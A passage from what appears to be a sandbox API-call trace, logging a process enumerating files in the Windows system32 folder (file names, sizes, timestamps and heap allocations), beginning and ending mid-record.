ftLastWriteTime.dwLowDateTime=0x6b4118b5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x75698, dwReserved0=0x0, dwReserved1=0x0, cFileName="advapi32.dll", cAlternateFileName="")) returned 1 [0102.712] lstrlenW (lpString="advapi32.dll") returned 12 [0102.712] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72f650 [0102.712] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709c1e87, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x709c1e87, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x709c1e87, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="advapi32res.dll", cAlternateFileName="")) returned 1 [0102.712] lstrlenW (lpString="advapi32res.dll") returned 15 [0102.712] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x72f6f8 [0102.712] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dfe1b37, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6dfe1b37, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6dfe1b37, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="advpack.dll", cAlternateFileName="")) returned 1 [0102.712] lstrlenW (lpString="advpack.dll") returned 11 [0102.728] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x72f7a0 [0102.728] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fccad72, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fccad72, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fccad72, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="aeevts.dll", cAlternateFileName="")) returned 1 [0102.729] lstrlenW (lpString="aeevts.dll") returned 10 [0102.729] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x72f840 [0102.729] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a40ef8, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x5f4b2585, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x41a40ef8, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x2efa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aepic.dll", cAlternateFileName="")) returned 1 [0102.729] lstrlenW (lpString="aepic.dll") returned 9 [0102.729] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x94) returned 0x72f8e0 [0102.729] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa435feea, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa5b5da3e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb8b3d300, ftLastWriteTime.dwHighDateTime=0x1d29f92, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="amcompat.tlb", cAlternateFileName="")) returned 1 [0102.729] lstrlenW (lpString="amcompat.tlb") returned 12 [0102.729] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc7e8a3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc7e8a3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc7e8a3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9400, dwReserved0=0x0, dwReserved1=0x0, cFileName="amsi.dll", cAlternateFileName="")) returned 1 [0102.729] lstrlenW (lpString="amsi.dll") returned 8 [0102.729] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x92) returned 0x72f980 [0102.729] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e1d1a81, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6e1d1a81, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6e1d1a81, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="amstream.dll", cAlternateFileName="")) returned 1 [0102.729] lstrlenW (lpString="amstream.dll") returned 12 [0102.730] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72fa20 [0102.730] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d252089, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d252089, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d252089, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x33c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apds.dll", cAlternateFileName="")) returned 1 [0102.730] lstrlenW (lpString="apds.dll") returned 8 [0102.730] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x92) returned 0x72fac8 [0102.730] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74321bca, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x74321bca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x74321bca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="APHostClient.dll", cAlternateFileName="")) returned 1 [0102.730] lstrlenW (lpString="APHostClient.dll") returned 16 [0102.730] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72cb68 [0102.730] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e21df53, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6e21df53, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6e21df53, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppCapture.dll", cAlternateFileName="")) returned 1 [0102.730] lstrlenW (lpString="AppCapture.dll") returned 14 [0102.730] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9e) returned 0x72fb68 [0102.730] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744791a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x744791a7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x744791a7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppContracts.dll", cAlternateFileName="")) returned 1 [0102.730] lstrlenW (lpString="AppContracts.dll") returned 16 [0102.730] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72cc18 [0102.731] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72258b18, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x72258b18, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x72258b18, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x21a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppExtension.dll", cAlternateFileName="")) returned 1 [0102.731] lstrlenW (lpString="AppExtension.dll") returned 16 [0102.731] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72ccc8 [0102.731] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f4006c, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x5f276227, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x47f4006c, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x8ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apphelp.dll", cAlternateFileName="")) returned 1 [0102.731] lstrlenW (lpString="apphelp.dll") returned 11 [0102.731] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x72fc10 [0102.731] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c17b100, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6c17b100, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6c17b100, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apphlpdm.dll", cAlternateFileName="")) returned 1 [0102.731] lstrlenW (lpString="Apphlpdm.dll") returned 12 [0102.731] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72fcb0 [0102.731] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf30e11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cf30e11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cf30e11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xce18, dwReserved0=0x0, dwReserved1=0x0, cFileName="appidapi.dll", cAlternateFileName="")) returned 1 [0102.731] lstrlenW (lpString="appidapi.dll") returned 12 [0102.732] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72fd58 [0102.732] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c750f74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xde5db67b, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xde5db67b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x45200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppIdPolicyEngineApi.dll", cAlternateFileName="")) returned 1 [0102.732] lstrlenW (lpString="AppIdPolicyEngineApi.dll") returned 24 [0102.732] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb2) returned 0x72fe00 [0102.732] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb4d569, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fb4d569, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fb4d569, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="appidtel.exe", cAlternateFileName="")) returned 1 [0102.732] lstrlenW (lpString="appidtel.exe") returned 12 [0102.732] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72fec0 [0102.732] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffb189f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x18454f5f, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0102.732] lstrlenW (lpString="AppLocker") returned 9 [0102.732] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x72ff68 [0102.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\AppLocker\\*", lpFindFileData=0x72ff68 | out: lpFindFileData=0x72ff68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffb189f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x18454f5f, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a098 [0102.733] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x72ff68 | out: lpFindFileData=0x72ff68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffb189f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x18454f5f, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.733] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x72ff68 | out: lpFindFileData=0x72ff68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffb189f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x18454f5f, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0102.733] FindClose (in: hFindFile=0x70a098 | out: hFindFile=0x70a098) returned 1 [0102.733] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72ff68 | out: hHeap=0x6f0000) returned 1 [0102.733] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb2730a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fb2730a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fb2730a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x38c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLockerCSP.dll", cAlternateFileName="")) returned 1 [0102.733] lstrlenW (lpString="AppLockerCSP.dll") returned 16 [0102.733] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72ced8 [0102.733] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2ca87d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xcfce7cb8, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xcfce7cb8, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppManagementConfiguration.dll", cAlternateFileName="")) returned 1 [0102.734] lstrlenW (lpString="AppManagementConfiguration.dll") returned 30 [0102.734] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xbe) returned 0x72ff68 [0102.734] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989d1038, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd5b016a3, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd5b016a3, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgmts.dll", cAlternateFileName="")) returned 1 [0102.734] lstrlenW (lpString="appmgmts.dll") returned 12 [0102.734] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x730030 [0102.734] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c750f74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1054e58, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1054e58, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x58c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgr.dll", cAlternateFileName="")) returned 1 [0102.734] lstrlenW (lpString="appmgr.dll") returned 10 [0102.734] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x731760 [0102.734] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x721e63de, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x721e63de, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x721e63de, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppointmentActivation.dll", cAlternateFileName="")) returned 1 [0102.734] lstrlenW (lpString="AppointmentActivation.dll") returned 25 [0102.734] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb4) returned 0x731980 [0102.734] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ca10e3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x72ca10e3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x72ca10e3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppointmentApis.dll", cAlternateFileName="")) returned 1 [0102.734] lstrlenW (lpString="AppointmentApis.dll") returned 19 [0102.735] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa8) returned 0x72cd78 [0102.735] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cfc97aa, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cfc97aa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cfc97aa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apprepapi.dll", cAlternateFileName="")) returned 1 [0102.735] lstrlenW (lpString="apprepapi.dll") returned 13 [0102.735] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9c) returned 0x7320f8 [0102.738] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a40ef8, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x64386418, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x41a40ef8, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7fc20, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppResolver.dll", cAlternateFileName="")) returned 1 [0102.738] lstrlenW (lpString="AppResolver.dll") returned 15 [0102.738] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x731f00 [0102.741] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2ca87d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd3b93b9a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd3b93b9a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVClientPS.dll", cAlternateFileName="")) returned 1 [0102.742] lstrlenW (lpString="AppVClientPS.dll") returned 16 [0102.743] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72d878 [0102.743] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42fc8a9d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63d44122, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x42fc8a9d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x1727a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVEntSubsystems32.dll", cAlternateFileName="")) returned 1 [0102.743] lstrlenW (lpString="AppVEntSubsystems32.dll") returned 23 [0102.743] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb0) returned 0x7300d8 [0102.743] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2a4622, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd3b21489, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd3b21489, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x35a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVSentinel.dll", cAlternateFileName="")) returned 1 [0102.743] lstrlenW (lpString="AppVSentinel.dll") returned 16 [0102.743] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72d9d8 [0102.743] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2ca87d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd3b21489, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd3b21489, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVTerminator.dll", cAlternateFileName="")) returned 1 [0102.743] lstrlenW (lpString="AppVTerminator.dll") returned 18 [0102.765] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa6) returned 0x72d668 [0102.765] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7632c079, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7632c079, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7632c079, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="appwiz.cpl", cAlternateFileName="")) returned 1 [0102.765] lstrlenW (lpString="appwiz.cpl") returned 10 [0102.765] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a1acad, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xf62eaf3e, ftLastAccessTime.dwHighDateTime=0x1d2fa0c, ftLastWriteTime.dwLowDateTime=0x41a40ef8, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x2c598, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppxAllUserStore.dll", cAlternateFileName="")) returned 1 [0102.765] lstrlenW (lpString="AppxAllUserStore.dll") returned 20 [0102.765] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaa) returned 0x730190 [0102.765] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72dac1b9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x72dac1b9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x72dac1b9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x85e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppxApplicabilityEngine.dll", cAlternateFileName="")) returned 1 [0102.765] lstrlenW (lpString="AppxApplicabilityEngine.dll") returned 27 [0102.765] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb8) returned 0x730248 [0102.765] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f18ba7f, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x6f18ba7f, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x6f18ba7f, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x7ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppXDeploymentClient.dll", 